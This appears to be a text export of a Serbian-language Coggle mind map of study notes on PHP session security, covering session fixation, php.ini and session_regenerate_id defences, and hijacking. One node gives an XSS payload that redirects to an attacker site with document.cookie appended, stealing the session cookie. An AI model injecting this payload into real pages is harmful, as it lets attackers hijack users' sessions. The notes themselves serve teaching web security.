Please enable JavaScript.
Coggle requires JavaScript to display documents.
Sequirity Session (Fixation (preuzetim, napadač, uloguje), session_ID…
Sequirity Session
Fixation
napadač
uloguje
preuzetim
session_ID
samo
serverska
skripta
zaštita
php.ini
session.use_only_cookies
uključiti
zabranjuje
unos
ID
url
minus
id
samo
cookie
preko
izmeniti
session.name = PHPSESSID
najbolje
možda
session_regenerate_id ();
odmah
nakon
session_start ();
autentikacija
if($_SESSION['userAgent'] == $_SERVER['HTTP_USER_AGENT'])
Cookie
C:\Documents and Settings\korisnik\Cookies\
• Firefox: tools > options > privacy > show cookies
JavaScript
document.cookie
window.location=’
http://sajtNapadaca.com?ck=’
+ document.cookie;
XSS
Hijacking
otmica
ID
preuzimanje
pogađanjem
sa
klient
računara